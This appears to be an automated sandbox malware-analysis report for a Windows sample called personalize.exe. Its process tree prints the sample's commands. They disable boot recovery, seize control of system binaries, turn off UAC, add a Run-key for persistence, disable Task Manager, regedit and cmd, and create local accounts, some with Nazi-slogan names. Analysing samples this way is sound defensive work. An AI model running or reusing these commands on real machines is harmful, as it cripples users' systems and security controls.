Analysis
-
max time kernel
63s -
max time network
66s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-06-2024 13:55
Static task
static1
Behavioral task
behavioral1
Sample
personalize.exe
Resource
win11-20240508-en
Errors
General
-
Target
personalize.exe
-
Size
832KB
-
MD5
3780f9b91fde991c40386927dae15096
-
SHA1
0ac6c6284751dd0bac7d58714f899c16da63256a
-
SHA256
8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7
-
SHA512
f5fcba684cb2b4d8c6000649140e693d1589e7f42cccbd9592d82d4c3c2c2cb635f3c851bdb2c95aa0bb8ed7872c9b6a55d7dec4734ca2da429b257e41246e2c
-
SSDEEP
24576:StA4KdTxn+SoA/baP35yfbSLF2aYVlHvAclDJDb:jdTlzV+P35yfsFI3vAclxb
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 6 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 5040 takeown.exe 4004 icacls.exe 3412 takeown.exe 4912 icacls.exe 3032 takeown.exe 3284 icacls.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exepid process 4584 attrib.exe 1224 attrib.exe -
Modifies file permissions 1 TTPs 6 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 5040 takeown.exe 4004 icacls.exe 3412 takeown.exe 4912 icacls.exe 3032 takeown.exe 3284 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe" reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 13 IoCs
Processes:
cmd.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\screenmelt.exe cmd.exe File opened for modification C:\Windows\System32\mbr.exe attrib.exe File opened for modification C:\Windows\System32\mmc.exe cmd.exe File opened for modification C:\Windows\System32\taskmgr.exe cmd.exe File opened for modification C:\Windows\System32\msiexec.exe cmd.exe File created C:\Windows\System32\colorcmd.exe cmd.exe File created C:\Windows\System32\screenmelt.exe cmd.exe File created C:\Windows\System32\mbr.exe cmd.exe File opened for modification C:\Windows\System32\colorcmd.exe cmd.exe File opened for modification C:\Windows\system32\winnt64.exe cmd.exe File opened for modification C:\Windows\System32\mbr.exe cmd.exe File created C:\Windows\system32\winnt64.exe cmd.exe File opened for modification C:\Windows\System32\winnt64.exe attrib.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" reg.exe -
Drops file in Windows directory 2 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\Web\winntcus64.png cmd.exe File created C:\Windows\Web\winntcus64.png cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 1748 timeout.exe 224 timeout.exe 1872 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "70" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
msedge.exemsedge.exemsedge.exeidentity_helper.exepid process 4876 msedge.exe 4876 msedge.exe 3676 msedge.exe 3676 msedge.exe 2092 msedge.exe 2092 msedge.exe 4864 identity_helper.exe 4864 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
Processes:
msedge.exepid process 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
takeown.exetakeown.exetakeown.exeshutdown.exedescription pid process Token: SeTakeOwnershipPrivilege 5040 takeown.exe Token: SeTakeOwnershipPrivilege 3412 takeown.exe Token: SeTakeOwnershipPrivilege 3032 takeown.exe Token: SeShutdownPrivilege 3784 shutdown.exe Token: SeRemoteShutdownPrivilege 3784 shutdown.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe 3676 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
PickerHost.exeLogonUI.exepid process 4928 PickerHost.exe 2820 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
personalize.execmd.exenet.exenet.exedescription pid process target process PID 4476 wrote to memory of 2800 4476 personalize.exe cmd.exe PID 4476 wrote to memory of 2800 4476 personalize.exe cmd.exe PID 2800 wrote to memory of 856 2800 cmd.exe choice.exe PID 2800 wrote to memory of 856 2800 cmd.exe choice.exe PID 2800 wrote to memory of 892 2800 cmd.exe choice.exe PID 2800 wrote to memory of 892 2800 cmd.exe choice.exe PID 2800 wrote to memory of 2316 2800 cmd.exe bcdedit.exe PID 2800 wrote to memory of 2316 2800 cmd.exe bcdedit.exe PID 2800 wrote to memory of 780 2800 cmd.exe cmd.exe PID 2800 wrote to memory of 780 2800 cmd.exe cmd.exe PID 2800 wrote to memory of 1464 2800 cmd.exe cmd.exe PID 2800 wrote to memory of 1464 2800 cmd.exe cmd.exe PID 2800 wrote to memory of 4584 2800 cmd.exe attrib.exe PID 2800 wrote to memory of 4584 2800 cmd.exe attrib.exe PID 2800 wrote to memory of 5040 2800 cmd.exe takeown.exe PID 2800 wrote to memory of 5040 2800 cmd.exe takeown.exe PID 2800 wrote to memory of 4004 2800 cmd.exe icacls.exe PID 2800 wrote to memory of 4004 2800 cmd.exe icacls.exe PID 2800 wrote to memory of 3412 2800 cmd.exe takeown.exe PID 2800 wrote to memory of 3412 2800 cmd.exe takeown.exe PID 2800 wrote to memory of 4912 2800 cmd.exe icacls.exe PID 2800 wrote to memory of 4912 2800 cmd.exe icacls.exe PID 2800 wrote to memory of 3032 2800 cmd.exe takeown.exe PID 2800 wrote to memory of 3032 2800 cmd.exe takeown.exe PID 2800 wrote to memory of 3284 2800 cmd.exe icacls.exe PID 2800 wrote to memory of 3284 2800 cmd.exe icacls.exe PID 2800 wrote to memory of 4108 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4108 2800 cmd.exe reg.exe PID 2800 wrote to memory of 2956 2800 cmd.exe rundll32.exe PID 2800 wrote to memory of 2956 2800 cmd.exe rundll32.exe PID 2800 wrote to memory of 1768 2800 cmd.exe reg.exe PID 2800 wrote to memory of 1768 2800 cmd.exe reg.exe PID 2800 wrote to memory of 1224 2800 cmd.exe attrib.exe PID 2800 wrote to memory of 1224 2800 cmd.exe attrib.exe PID 2800 wrote to memory of 4924 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4924 2800 cmd.exe reg.exe PID 2800 wrote to memory of 3052 2800 cmd.exe reg.exe PID 2800 wrote to memory of 3052 2800 cmd.exe reg.exe PID 2800 wrote to memory of 3580 2800 cmd.exe reg.exe PID 2800 wrote to memory of 3580 2800 cmd.exe reg.exe PID 2800 wrote to memory of 2828 2800 cmd.exe reg.exe PID 2800 wrote to memory of 2828 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4580 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4580 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4064 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4064 2800 cmd.exe reg.exe PID 2800 wrote to memory of 860 2800 cmd.exe reg.exe PID 2800 wrote to memory of 860 2800 cmd.exe reg.exe PID 2800 wrote to memory of 968 2800 cmd.exe reg.exe PID 2800 wrote to memory of 968 2800 cmd.exe reg.exe PID 2800 wrote to memory of 948 2800 cmd.exe reg.exe PID 2800 wrote to memory of 948 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4520 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4520 2800 cmd.exe reg.exe PID 2800 wrote to memory of 1352 2800 cmd.exe reg.exe PID 2800 wrote to memory of 1352 2800 cmd.exe reg.exe PID 2800 wrote to memory of 4940 2800 cmd.exe net.exe PID 2800 wrote to memory of 4940 2800 cmd.exe net.exe PID 4940 wrote to memory of 4832 4940 net.exe net1.exe PID 4940 wrote to memory of 4832 4940 net.exe net1.exe PID 2800 wrote to memory of 2396 2800 cmd.exe net.exe PID 2800 wrote to memory of 2396 2800 cmd.exe net.exe PID 2396 wrote to memory of 2288 2396 net.exe net1.exe PID 2396 wrote to memory of 2288 2396 net.exe net1.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 4584 attrib.exe 1224 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\personalize.exe"C:\Users\Admin\AppData\Local\Temp\personalize.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat C:\Users\Admin\AppData\Local\Temp\personalize.exe"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /c yn /n /m ""3⤵
-
C:\Windows\system32\choice.exechoice /c yn /n /m ""3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd.exe3⤵
-
C:\Windows\system32\cmd.execmd.exe3⤵
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Windows\System32\mbr.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\taskmgr.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\windows\system32\taskmgr.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\mmc.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\windows\system32\mmc.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\msiexec.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\windows\system32\msiexec.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f3⤵
- Sets desktop wallpaper using registry
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Windows\System32\winnt64.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows NT Personalization tool" /T REG_SZ /F /D "C:\Windows\System32\winnt64.exe"3⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoThemesTab /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f3⤵
-
C:\Windows\system32\net.exenet user /add NTCUS ntcus1233⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add NTCUS ntcus1234⤵
-
C:\Windows\system32\net.exenet user /add NTUSER ntcus1243⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add NTUSER ntcus1244⤵
-
C:\Windows\system32\net.exenet user /add NTDAT ntpersonalize3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add NTDAT ntpersonalize4⤵
-
C:\Windows\system32\net.exenet user /add DC discord3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add DC discord4⤵
-
C:\Windows\system32\net.exenet user /add cfs belgium3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add cfs belgium4⤵
-
C:\Windows\system32\net.exenet user /add leopoldII belgium3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add leopoldII belgium4⤵
-
C:\Windows\system32\net.exenet user /add SCHJIEAB rykn3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add SCHJIEAB rykn4⤵
-
C:\Windows\system32\net.exenet user /add IZWYOKWYIEN rykn3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add IZWYOKWYIEN rykn4⤵
-
C:\Windows\system32\net.exenet user /add asap asap3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add asap asap4⤵
-
C:\Windows\system32\net.exenet user /add REICHTANGLE ig13⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add REICHTANGLE ig14⤵
-
C:\Windows\system32\net.exenet user /add SIEGHEIL hitler3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add SIEGHEIL hitler4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f3⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\timeout.exetimeout /t 15 /nobreak3⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=HAHAHAHAHAHA3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:14⤵
-
C:\Windows\system32\timeout.exetimeout /t 15 /nobreak3⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=russian+democratic+federative+republic3⤵
-
